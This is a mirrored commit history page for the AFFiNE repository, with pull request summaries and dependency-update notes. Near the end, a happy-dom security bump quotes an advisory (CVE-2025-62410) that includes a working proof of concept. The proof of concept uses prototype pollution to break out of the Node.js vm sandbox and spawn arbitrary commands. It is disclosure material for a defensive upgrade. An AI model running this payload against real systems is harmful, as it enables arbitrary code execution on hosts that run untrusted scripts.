mirror of
https://github.com/toeverything/AFFiNE.git
synced 2026-02-04 08:38:34 +00:00
17f2ebc4deac379a2ad00d40e98d3bd64f953d12
10955 Commits
| Author | SHA1 | Message | Date | |
|---|---|---|---|---|
|
|
6ec1948f62 |
feat(editor): release callout (#13896)
## Summary by CodeRabbit

* **Refactor**
  * Callout is no longer gated as an experimental option — it now consistently appears in the editor’s slash menu and toolbar where applicable.
* **Tests**
  * End-to-end slash-menu tests updated to expect the Callout item in search results and adjusted item ordering.
* **Chores**
  * Repository ignore rules updated to exclude .kiro files.

v0.25.4 |
||
|
|
7e6ead4232 | feat: native doc reader (#13881) | ||
|
|
02dcfdcc40 |
chore(native): remove unused deps (#13854)
Identified some unused dependencies and refactored them. |
||
|
|
5a2f508dac |
feat(editor): hidden 'add icon' label on print if icon is not set (#13868)
This caption (see screenshot) is added when you try to print a doc, even if there is no icon. <img width="1269" height="897" alt="image" src="https://github.com/user-attachments/assets/d63383e6-48a2-44fb-8f32-ae91d1e9e8c6" /> |
||
|
|
2bd9f1a353 |
feat: implement tray and minimize behaviors (#13851)
This PR introduces new window behaviors, which can be enabled when the menubar setting is active:

New Features:
- Quick open from tray icon
- Minimize to tray
- Exit to tray
- Start minimized

These changes have not yet been tested on macOS.

<img width="645" height="479" alt="image" src="https://github.com/user-attachments/assets/7bdd13d0-5322-45a4-8e71-85c081aa0c86" />

## Summary by CodeRabbit

* **New Features**
  * Configurable menubar/tray behaviors: open on left-click, minimize to tray, close to tray (exit to tray), and start minimized.
* **UI**
  * Appearance settings add a Menubar → Window Behavior group with four toggles; group shows only when menubar/tray is enabled (hidden on macOS).
* **Settings**
  * Tray settings persisted and exposed via the settings API with getters and setters for each option.
* **Localization**
  * Added translation keys and English strings for the new controls and descriptions.

---------

Co-authored-by: Peng Xiao <pengxiao@outlook.com> |
||
|
|
9f6ea83ac1 |
fix(editor): linked doc popover close when layout is switched (#13867)
Fixing the disappearing linked doc menu called by @ when switching language using Alt+Shift. |
||
|
|
d33df659f8 | feat: check server type in chat (#13875) | ||
|
|
c9a4129a3e | fix: a security issue related to open external (#13864) | ||
|
|
dd676611ce | test: fix mock api v0.25.3-beta.0 v0.25.3 | ||
|
|
f3bb2be5ef | feat: request apply subscription mutation (#13844) | ||
|
|
8535b3dc41 | feat(server): refresh subscription if event is from anonymous account (#13840) | ||
|
|
89cc9b072b |
feat(server): early subscription for iap (#13826)
## Summary by CodeRabbit

* **New Features**
  * Added a mutation to request/apply a subscription by transaction ID (client mutation and server operation), returning subscription details.
* **Bug Fixes / Improvements**
  * More robust external subscription sync with safer conflict detection, optional short-lived confirmation, improved parsing and error logging.
* **Chores**
  * Standardized time constants for clarity.
* **Tests**
  * Updated subscription test data (expiration date) to reflect new lifecycle expectations. |
||
|
|
e4b5b24fdd | chore: bump package version | ||
|
|
9904f50e0b |
feat(server): improve crypto (#13822)
## Summary by CodeRabbit

* **Bug Fixes**
  * Resolved cryptographic compatibility issues with OpenSSL 3.x.
* **New Features**
  * Broader support for multiple key types for signing and verification.
  * OTP generation adjusted (affects digit distribution/values).
* **Refactor**
  * Internal cryptographic key handling reworked for improved stability, compatibility, and multi-key-type support. |
||
|
|
b7ac7caab4 |
chore(server): improve transcript stability (#13821)
## Summary by CodeRabbit

* **New Features**
  * Enhanced audio/video detection for MP4 files to better distinguish audio-only vs. video.
* **Dependencies**
  * Added MP4 parsing dependency and updated AI provider libraries (Anthropic, Google, OpenAI, etc.).
* **Bug Fixes**
  * Tightened authentication state validation for magic-link/OTP flows.
  * Stricter space-join validation to reject invalid client types/versions.
  * Improved transcript entry deduplication and data handling.
* **API**
  * Transcript submit payload now requires infos and removes deprecated url/mimeType fields. |
||
|
|
d74087fdc5 |
fix(blocksuite): stabilize cross-document clipboard snapshot handling (#13817)
This PR addresses issue Fixes: #13805 (cross-document copy/paste not working).

Locally verified that:
- Copy → paste between two documents now works consistently.
- Clipboard snapshot payload remains intact when encoded/decoded.
- External paste (e.g., to Notepad or browser text field) functions correctly.

E2E tests for clipboard behavior were added, but Playwright browsers could not be installed in the container (`HTTP 403` from CDN). Manual verification confirms the fix works as intended.

## Summary by CodeRabbit

* **Tests**
  * Added cross-document clipboard regression tests for copy/paste between documents, external clipboard validation, and multi-block copy; duplicate test entries noted.
* **Chores**
  * Minor formatting and whitespace cleanup around clipboard handling.
  * Improved error handling in paste flows.
  * Standardized HTML formatting for clipboard payload attributes. |
||
|
|
875565d08a |
fix(server): avoid a snowball effect of email sending failures (#13818)
fix #13802 |
||
|
|
0ecd915245 | docs: update readme | ||
|
|
b5ebd20314 |
fix(core): prevent container privilege escalation in .devcontainer/docker-compose.yml (#13814)
**Context and Purpose:**

This PR automatically remediates a security vulnerability:
- **Description:** Service 'app' allows for privilege escalation via setuid or setgid binaries. Add 'no-new-privileges:true' in 'security_opt' to prevent this.
- **Rule ID:** yaml.docker-compose.security.no-new-privileges.no-new-privileges
- **Severity:** HIGH
- **File:** .devcontainer/docker-compose.yml
- **Lines Affected:** 4 - 4

This change is necessary to protect the application from potential security risks associated with this vulnerability.

**Solution Implemented:**

The automated remediation process has applied the necessary changes to the affected code in `.devcontainer/docker-compose.yml` to resolve the identified issue. Please review the changes to ensure they are correct and integrate as expected.

## Summary by CodeRabbit

* **Chores**
  * Enhanced security configuration for the development environment. |
||
|
|
c102e2454f |
feat(server): fetch missing field from rcat (#13794)
## Summary by CodeRabbit

* **Performance**
  * Added caching mechanism for subscription product data to reduce API calls and improve response times.
* **Improvements**
  * Enhanced asynchronous processing of subscription entitlements for more reliable product data retrieval from the payment provider. |
||
|
|
5fc3258a3d |
feat(server): expose mail server name config in admin dashboard (#13792)
## Summary by CodeRabbit

* **New Features**
  * Added SMTP name configuration field to notification settings. |
||
|
|
1a9863d36f |
chore: bump up opentelemetry (#12651)
This PR contains the following updates:

| Package | Change | Age | Confidence |
|---|---|---|---|
| [@opentelemetry/exporter-prometheus](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-exporter-prometheus) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.57.0` -> `^0.207.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-prometheus/0.57.2/0.207.0) | | |
| [@opentelemetry/host-metrics](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/host-metrics#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/host-metrics)) | [`^0.35.4` -> `^0.36.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fhost-metrics/0.35.5/0.36.2) | | |
| [@opentelemetry/instrumentation](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.57.0` -> `^0.207.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation/0.57.2/0.207.0) | | |
| [@opentelemetry/instrumentation-graphql](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-graphql#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-graphql)) | [`^0.47.0` -> `^0.55.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-graphql/0.47.1/0.55.0) | | |
| [@opentelemetry/instrumentation-http](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation-http) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.57.0` -> `^0.207.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-http/0.57.2/0.207.0) | | |
| [@opentelemetry/instrumentation-ioredis](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-ioredis#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-ioredis)) | [`^0.47.0` -> `^0.55.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-ioredis/0.47.1/0.55.0) | | |
| [@opentelemetry/instrumentation-nestjs-core](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-nestjs-core#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-nestjs-core)) | [`^0.44.0` -> `^0.54.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-nestjs-core/0.44.1/0.54.0) | | |
| [@opentelemetry/instrumentation-socket.io](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-socket.io#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-socket.io)) | [`^0.46.0` -> `^0.54.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-socket.io/0.46.1/0.54.0) | | |
| [@opentelemetry/sdk-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-sdk-node) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.57.0` -> `^0.207.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-node/0.57.2/0.207.0) | | |

---

### Release Notes

<details> <summary>open-telemetry/opentelemetry-js (@opentelemetry/exporter-prometheus)</summary>

### [`v0.207.0`]( |
||
|
|
35c2ad262f |
chore: bump next from 15.3.2 to 15.5.4 (#13739)
Bumps [next](https://github.com/vercel/next.js) from 15.3.2 to 15.5.4. <details> <summary>Release notes</summary> <p><em>Sourced from <a href="https://github.com/vercel/next.js/releases">next's releases</a>.</em></p> <blockquote> <h2>v15.5.4</h2> <blockquote> <p>[!NOTE]<br /> This release is backporting bug fixes. It does <strong>not</strong> include all pending features/changes on canary.</p> </blockquote> <h3>Core Changes</h3> <ul> <li>fix: ensure onRequestError is invoked when otel enabled (<a href="https://redirect.github.com/vercel/next.js/issues/83343">#83343</a>)</li> <li>fix: devtools initial position should be from next config (<a href="https://redirect.github.com/vercel/next.js/issues/83571">#83571</a>)</li> <li>[devtool] fix overlay styles are missing (<a href="https://redirect.github.com/vercel/next.js/issues/83721">#83721</a>)</li> <li>Turbopack: don't match dynamic pattern for node_modules packages (<a href="https://redirect.github.com/vercel/next.js/issues/83176">#83176</a>)</li> <li>Turbopack: don't treat metadata routes as RSC (<a href="https://redirect.github.com/vercel/next.js/issues/82911">#82911</a>)</li> <li>[turbopack] Improve handling of symlink resolution errors in track_glob and read_glob (<a href="https://redirect.github.com/vercel/next.js/issues/83357">#83357</a>)</li> <li>Turbopack: throw large static metadata error earlier (<a href="https://redirect.github.com/vercel/next.js/issues/82939">#82939</a>)</li> <li>fix: error overlay not closing when backdrop clicked (<a href="https://redirect.github.com/vercel/next.js/issues/83981">#83981</a>)</li> <li>Turbopack: flush Node.js worker IPC on error (<a href="https://redirect.github.com/vercel/next.js/issues/84077">#84077</a>)</li> </ul> <h3>Misc Changes</h3> <ul> <li>[CNA] use linter preference (<a href="https://redirect.github.com/vercel/next.js/issues/83194">#83194</a>)</li> <li>CI: use KV for test timing data (<a 
href="https://redirect.github.com/vercel/next.js/issues/83745">#83745</a>)</li> <li>docs: september improvements and fixes (<a href="https://redirect.github.com/vercel/next.js/issues/83997">#83997</a>)</li> </ul> <h3>Credits</h3> <p>Huge thanks to <a href="https://github.com/yiminghe"><code>@yiminghe</code></a>, <a href="https://github.com/huozhi"><code>@huozhi</code></a>, <a href="https://github.com/devjiwonchoi"><code>@devjiwonchoi</code></a>, <a href="https://github.com/mischnic"><code>@mischnic</code></a>, <a href="https://github.com/lukesandberg"><code>@lukesandberg</code></a>, <a href="https://github.com/ztanner"><code>@ztanner</code></a>, <a href="https://github.com/icyJoseph"><code>@icyJoseph</code></a>, <a href="https://github.com/leerob"><code>@leerob</code></a>, <a href="https://github.com/fufuShih"><code>@fufuShih</code></a>, <a href="https://github.com/dwrth"><code>@dwrth</code></a>, <a href="https://github.com/aymericzip"><code>@aymericzip</code></a>, <a href="https://github.com/obendev"><code>@obendev</code></a>, <a href="https://github.com/molebox"><code>@molebox</code></a>, <a href="https://github.com/OoMNoO"><code>@OoMNoO</code></a>, <a href="https://github.com/pontasan"><code>@pontasan</code></a>, <a href="https://github.com/styfle"><code>@styfle</code></a>, <a href="https://github.com/HondaYt"><code>@HondaYt</code></a>, <a href="https://github.com/ryuapp"><code>@ryuapp</code></a>, <a href="https://github.com/lpalmes"><code>@lpalmes</code></a>, and <a href="https://github.com/ijjk"><code>@ijjk</code></a> for helping!</p> <h2>v15.5.3</h2> <blockquote> <p>[!NOTE]<br /> This release is backporting bug fixes. 
It does <strong>not</strong> include all pending features/changes on canary.</p> </blockquote> <h3>Core Changes</h3> <ul> <li>fix: validation return types of pages API routes (<a href="https://redirect.github.com/vercel/next.js/issues/83069">#83069</a>)</li> <li>fix: relative paths in dev in validator.ts (<a href="https://redirect.github.com/vercel/next.js/issues/83073">#83073</a>)</li> <li>fix: remove satisfies keyword from type validation to preserve old TS compatibility (<a href="https://redirect.github.com/vercel/next.js/issues/83071">#83071</a>)</li> </ul> <h3>Credits</h3> <p>Huge thanks to <a href="https://github.com/bgub"><code>@bgub</code></a> for helping!</p> <h2>v15.5.2</h2> <blockquote> <p>[!NOTE]<br /> This release is backporting bug fixes. It does <strong>not</strong> include all pending features/changes on canary.</p> </blockquote> <h3>Core Changes</h3> <ul> <li>fix: disable unknownatrules lint rule entirely (<a href="https://redirect.github.com/vercel/next.js/issues/83059">#83059</a>)</li> <li>revert: add ?dpl to fonts in /_next/static/media (<a href="https://redirect.github.com/vercel/next.js/issues/83062">#83062</a>)</li> </ul> <h3>Credits</h3> <!-- raw HTML omitted --> </blockquote> <p>... (truncated)</p> </details> <details> <summary>Commits</summary> <ul> <li><a href=" |
||
|
|
a0613b6306 |
feat(core): enhance Notion import with folder hierarchy and page icons (#13692)
Hi 👋 Love what you're doing with AFFiNE, I found my Notion replacement in this app. Coming from Notion and importing my workspaces, I saw the need to improve the import functionality to replicate the folder hierarchy from Notion into the AFFiNE folder structure in the `Organize` section. There are a few issues (i.e. #12961 and #13629) of people that expected the same behavior. This should make it a lot easier for people to move over.

### Technical description

Improve Notion import functionality to preserve organizational structure and page icons from exports:
- Add folder hierarchy preservation during Notion import
- Extract and set page icons (emoji and image) from Notion HTML
- Integrate with OrganizeService to recreate folder structure
- Use ExplorerIconService to apply page icons to imported documents
- Tested using production workspace exports from Notion, several thousand pages and multiple hierarchy levels deep.

## Summary by CodeRabbit

- New Features
  - Imports from Notion/HTML now recreate folder hierarchies and link imported pages into that structure.
  - Page icons (emoji and supported images) are extracted and attached to imported pages.
  - Import results now include the created root folder for quick access.
- Improvements
  - Import flows integrate folder creation and icon assignment with non-blocking error handling.
- Bug Fixes
  - Avoids including undefined page IDs in successful imports.

---------

Co-authored-by: DarkSky <darksky2048@gmail.com>
Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com> |
||
|
|
c18840038f |
chore: bump up @sentry/electron version to v7 (#13652)
This PR contains the following updates:

| Package | Change | Age | Confidence |
|---|---|---|---|
| [@sentry/electron](https://redirect.github.com/getsentry/sentry-electron) | [`^6.1.0` -> `^7.0.0`](https://renovatebot.com/diffs/npm/@sentry%2felectron/6.6.0/7.2.0) | | |

---

### Release Notes

<details> <summary>getsentry/sentry-electron (@sentry/electron)</summary>

### [`v7.2.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#720)

[Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/7.1.1...7.2.0)

- feat: Update JavaScript SDKs from [v10.11.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/10.11.0) to [v10.17.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/10.17.0)
- feat: Log os and device attributes ([#1246](https://redirect.github.com/getsentry/sentry-electron/issues/1246))

### [`v7.1.1`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#711)

[Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/7.1.0...7.1.1)

- fix: Preload injection path ([#1243](https://redirect.github.com/getsentry/sentry-electron/issues/1243))
- fix: Preload `contextIsolation` issues ([#1244](https://redirect.github.com/getsentry/sentry-electron/issues/1244))
- fix: Include `sentry.origin` with auto-generated logs ([#1241](https://redirect.github.com/getsentry/sentry-electron/issues/1241))

### [`v7.1.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#710)

[Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/7.0.0...7.1.0)

- feat: Update JavaScript SDKs from [v10.7.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/10.7.0) to [v10.11.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/10.11.0) ([#1236](https://redirect.github.com/getsentry/sentry-electron/issues/1236))
- feat: Optional Namespaced IPC ([#1234](https://redirect.github.com/getsentry/sentry-electron/issues/1234))
- fix: Export `ErrorEvent` type ([#1229](https://redirect.github.com/getsentry/sentry-electron/issues/1229))
- fix: Only capture logs if `enableLogs` is true ([#1235](https://redirect.github.com/getsentry/sentry-electron/issues/1235))

### [`v7.0.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#700)

[Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.11.0...7.0.0)

This release updates the underlying Sentry JavaScript SDKs to v10 which includes some breaking changes. Check out the [migration guide](./MIGRATION.md) for more details.

- feat: Update JavaScript SDKs to v10.8.0 ([#1205](https://redirect.github.com/getsentry/sentry-electron/issues/1205))

### [`v6.11.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#6110)

[Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.10.0...6.11.0)

- feat: Update JavaScript SDKs from [v9.45.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.45.0) to [v9.46.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.46.0)
- fix: Ensure native directory ends up in package ([#1216](https://redirect.github.com/getsentry/sentry-electron/issues/1216))

### [`v6.10.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#6100)

[Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.9.0...6.10.0)

- feat: Update JavaScript SDKs from [v9.43.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.43.0) to [v9.45.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.45.0)
- fix: Don't use `deepmerge` to merge events to remove circular ref. issues ([#1210](https://redirect.github.com/getsentry/sentry-electron/issues/1210))
- fix: Support `node16` for TypeScript `moduleResolution` ([#1203](https://redirect.github.com/getsentry/sentry-electron/issues/1203))

### [`v6.9.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#690)

[Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.8.0...6.9.0)

- feat: Update JavaScript SDKs from [v9.26.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.26.0) to [v9.43.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.43.0)
- feat: Add `eventLoopBlockIntegration` ([#1188](https://redirect.github.com/getsentry/sentry-electron/issues/1188))
- feat: Move renderer event loop block detection to an integration ([#1196](https://redirect.github.com/getsentry/sentry-electron/issues/1196))

### [`v6.8.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#680)

[Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.7.0...6.8.0)

- feat: Update JavaScript SDKs from [v9.25.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.25.0) to [v9.26.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.26.0)
- fix: Don't capture stack traces from destroyed renderers ([#1165](https://redirect.github.com/getsentry/sentry-electron/issues/1165))

### [`v6.7.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#670)

[Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.6.0...6.7.0)

- feat: Update JavaScript SDKs from [v9.18.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.18.0) to [v9.25.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.25.0)
- feat: Add structured logging support ([#1159](https://redirect.github.com/getsentry/sentry-electron/issues/1159))

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update again.

---

- [ ] If you want to rebase/retry this PR, check this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
e2de0e0e3d |
fix(editor): add trash state for linked-doc and synced-doc appearance (#13767)
This PR updates the appearance of `embed-linked-doc-block` and `embed-synced-doc-block` to reflect the trashed state of their linked documents. Previously, these blocks showed no visual difference whether the linked document was trashed or not, despite the existence of code for deletion-related appearance. This change ensures that the deletion appearance is properly displayed.

## Summary by CodeRabbit

* **New Features**
  * Documents now support trash state tracking for improved deletion management
* **Bug Fixes**
  * Improved synchronization and refresh of embedded documents when document states change
  * Enhanced handling of trashed documents in embedded content |
||
|
|
6fb0ff9177 |
chore(native): simplify Array::get method with functional approach (#13771)
## Issue

The Array::get method used verbose nested Option handling with redundant returns, making the code longer and less Rust idiomatic.

## Solution

Replaced the nested if let structure with a functional and_then approach that:
- Eliminates redundant return keyword usage
- Flattens Option handling for cleaner logic
- Reduces code from 13 lines to 9 lines
- Maintains identical functionality

## Result

More idiomatic Rust code that's easier to read and maintain, with all tests passing.

## Summary by CodeRabbit

* **Refactor**
  * Improved internal code structure with functional programming patterns for enhanced maintainability. No visible changes to end-user functionality.

Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com> |
||
|
|
c2fb6adfd8 |
feat(mobile): add discord link in setting (#13789)
## Summary by CodeRabbit

* **New Features**
  * Added a new Discord community link in the mobile settings Others section with an animated "Hot" badge
* **Localization**
  * Added multilingual support for the new Discord link across all supported languages |
||
|
|
8aeb8bd0ca |
feat(ios): insert app user id to rc (#13756)
This pull request integrates RevenueCat into the iOS paywall system, enabling user authentication and subscription management through the RevenueCat SDK. It introduces new dependencies, updates the paywall plugin initialization, and adds logic to fetch and use the current user identifier from the web context for RevenueCat login. The most important changes are grouped below:

**RevenueCat Integration and Configuration:**

* Added `purchases-ios-spm` (RevenueCat) as a Swift Package dependency in `AffinePaywall` and updated `Package.resolved` to track the new dependency. (`packages/frontend/apps/ios/App/Packages/AffinePaywall/Package.swift`, `packages/frontend/apps/ios/App/App.xcworkspace/xcshareddata/swiftpm/Package.resolved`) [[1]](diffhunk://#diff-7716c691e65a220dad542e024fbf91547c45ea69ddff1d0b6a002a497cd7c8ecR20-R28) [[2]](diffhunk://#diff-63609de9bdfc08b8a0691a4f0ddb7ddff07ae76b40ec2ee7c12adb7db226eb3cR48-R56)
* Implemented `Paywall.setup()` for initializing RevenueCat configuration, including setting log level, proxy URL, and a static API key. (`packages/frontend/apps/ios/App/Packages/AffinePaywall/Sources/AffinePaywall/Paywall.swift`, `packages/frontend/apps/ios/App/Plugins/PayWall/PayWallPlugin.swift`) [[1]](diffhunk://#diff-bce0a21a4e7695b7bf2430cd6b8a85fbc84124cc3be83f3288119992b7abb6cdR8-R30) [[2]](diffhunk://#diff-1854d318d8fd8736d078f5960373ed440836263649a8193c8ee33e72a99424edR14)

**User Authentication and Subscription State:**

* Enhanced the paywall ViewModel logic to fetch the current user identifier from the web context (`window.getCurrentUserIdentifier`), configure RevenueCat, and log in the user before fetching subscription state. Improved error handling and ensured external entitlement fetching is robust. (`packages/frontend/apps/ios/App/Packages/AffinePaywall/Sources/AffinePaywall/Model/ViewModel+Action.swift`) [[1]](diffhunk://#diff-df2cb61867b4ff10dee98d534cf3c94fe8d48ebaef3f219450a9fba26725fdcbR9) [[2]](diffhunk://#diff-df2cb61867b4ff10dee98d534cf3c94fe8d48ebaef3f219450a9fba26725fdcbL120-R155) [[3]](diffhunk://#diff-df2cb61867b4ff10dee98d534cf3c94fe8d48ebaef3f219450a9fba26725fdcbR165)
* Added a global JavaScript function `getCurrentUserIdentifier` to the iOS web context to retrieve the current user's account ID for use in RevenueCat login. (`packages/frontend/apps/ios/src/app.tsx`)

**Project Metadata:**

* Downgraded the `objectVersion` in the Xcode project file, possibly to maintain compatibility with other tools or environments. (`packages/frontend/apps/ios/App/App.xcodeproj/project.pbxproj`)

## Summary by CodeRabbit

* **New Features**
  * Paywall now initializes automatically for a smoother subscription flow.
  * New global API to retrieve the current user identifier from the app context.
* **Improvements**
  * Added integration to better coordinate subscription/login state before showing paywall options.
  * Ensures user identity is validated prior to entitlement checks, improving accuracy.
  * Improved error messages and logging during purchase/login flows.
* **Bug Fixes**
  * Fixed intermittent issues where subscription status could fail to load or appear outdated. |
||
|
|
a47042cbd5 |
chore: bump up happy-dom version to v20.0.2 [SECURITY] (#13765)
This PR contains the following updates:
| Package | Change | Age | Confidence |
|---|---|---|---|
| [happy-dom](https://redirect.github.com/capricorn86/happy-dom) | [`20.0.0` -> `20.0.2`](https://renovatebot.com/diffs/npm/happy-dom/20.0.0/20.0.2) | | |
### GitHub Vulnerability Alerts
#### [CVE-2025-62410](https://redirect.github.com/capricorn86/happy-dom/security/advisories/GHSA-qpm2-6cq5-7pq5)
### Summary
The mitigation proposed in GHSA-37j7-fg3j-429f for disabling eval/Function when executing untrusted code in happy-dom does not suffice, since it still allows prototype pollution payloads.
### Details
The untrusted script and the rest of the application still run in the same Isolate/process, so attackers can deploy prototype pollution payloads to hijack important references like "process" in the example below, or to hijack control flow via flipping checks of undefined property. There might be other payloads that allow the manipulation of require, e.g., via (universal) gadgets (https://www.usenix.org/system/files/usenixsecurity23-shcherbakov.pdf).
### PoC
Attackers can pollute builtins like Object.prototype.hasOwnProperty() to obtain important references at runtime, e.g., "process". In this way, attackers might be able to execute arbitrary commands like in the example below via spawn().
```js import { Browser } from "happy-dom"; const browser = new Browser({settings: {enableJavaScriptEvaluation: true}}); const page = browser.newPage({console: true}); page.url = 'https://example.com'; let payload = 'spawn_sync = process.binding(`spawn_sync`);normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(` `);typeof a.shell===`string`?c=a.shell:c=`/bin/sh`,b=[`-c`,g];}typeof a.argv0===`string`?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+`=`+d[f]);return{file:c,args:b,options:a,envPairs:e};};spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:`pipe`,readable:!0,writable:!1},{type:`pipe`,readable:!1,writable:!0},{type:`pipe`,readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0]);g.input=a.input;}for(c=0;c<a.stdio.length;c++){var e=a.stdio[c]&&a.stdio[c].input;if(e!=null){var f=a.stdio[c]=util._extend({},a.stdio[c]);isUint8Array(e)?f.input=e:f.input=Buffer.from(e,a.encoding);}}var b=spawn_sync.spawn(a);if(b.output&&a.encoding&&a.encoding!==`buffer`)for(c=0;c<b.output.length;c++){if(!b.output[c])continue;b.output[c]=b.output[c].toString(a.encoding);}return b.stdout=b.output&&b.output[1],b.stderr=b.output&&b.output[2],b.error&&(b.error= b.error + `spawnSync `+d.file,b.error.path=d.file,b.error.spawnargs=d.args.slice(1)),b;};' page.content = `<html> <script> function f() { let process = this; ${payload}; spawnSync("touch", ["success.flag"]); return "success";} this.constructor.constructor.__proto__.__proto__.toString = f; this.constructor.constructor.__proto__.__proto__.hasOwnProperty = f; // Other methods that can be abused this way: isPrototypeOf, propertyIsEnumerable, valueOf </script> <body>Hello world!</body></html>`; await browser.close(); console.log(`The process 
object is ${process}`); console.log(process.hasOwnProperty('spawn')); ``` ### Impact Arbitrary code execution via breaking out of the Node.js' vm isolation. ### Recommended Immediate Actions Users can freeze the builtins in the global scope to defend against attacks similar to the PoC above. However, the untrusted code might still be able to retrieve all kind of information available in the global scope and exfiltrate them via fetch(), even without prototype pollution capabilities. Not to mention side channels caused by the shared process/isolate. Migration to [isolated-vm](https://redirect.github.com/laverdet/isolated-vm) is suggested instead. Cris from the Endor Labs Security Research Team, who has worked extensively on JavaScript sandboxing in the past, submitted this advisory. --- ### Release Notes <details> <summary>capricorn86/happy-dom (happy-dom)</summary> ### [`v20.0.2`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v20.0.2) [Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v20.0.1...v20.0.2) ##### :construction\_worker\_man: Patch fixes - Adds frozen intrinsics flag to workers in `@happy-dom/server-renderer` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1934](https://redirect.github.com/capricorn86/happy-dom/issues/1934) ### [`v20.0.1`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v20.0.1) [Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v20.0.0...v20.0.1) ##### :construction\_worker\_man: Patch fixes - Adds warning for environment with unfrozen intrinsics (builtins) when JavaScript evaluation is enabled- By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1932](https://redirect.github.com/capricorn86/happy-dom/issues/1932) - A security advisory has been reported showing that 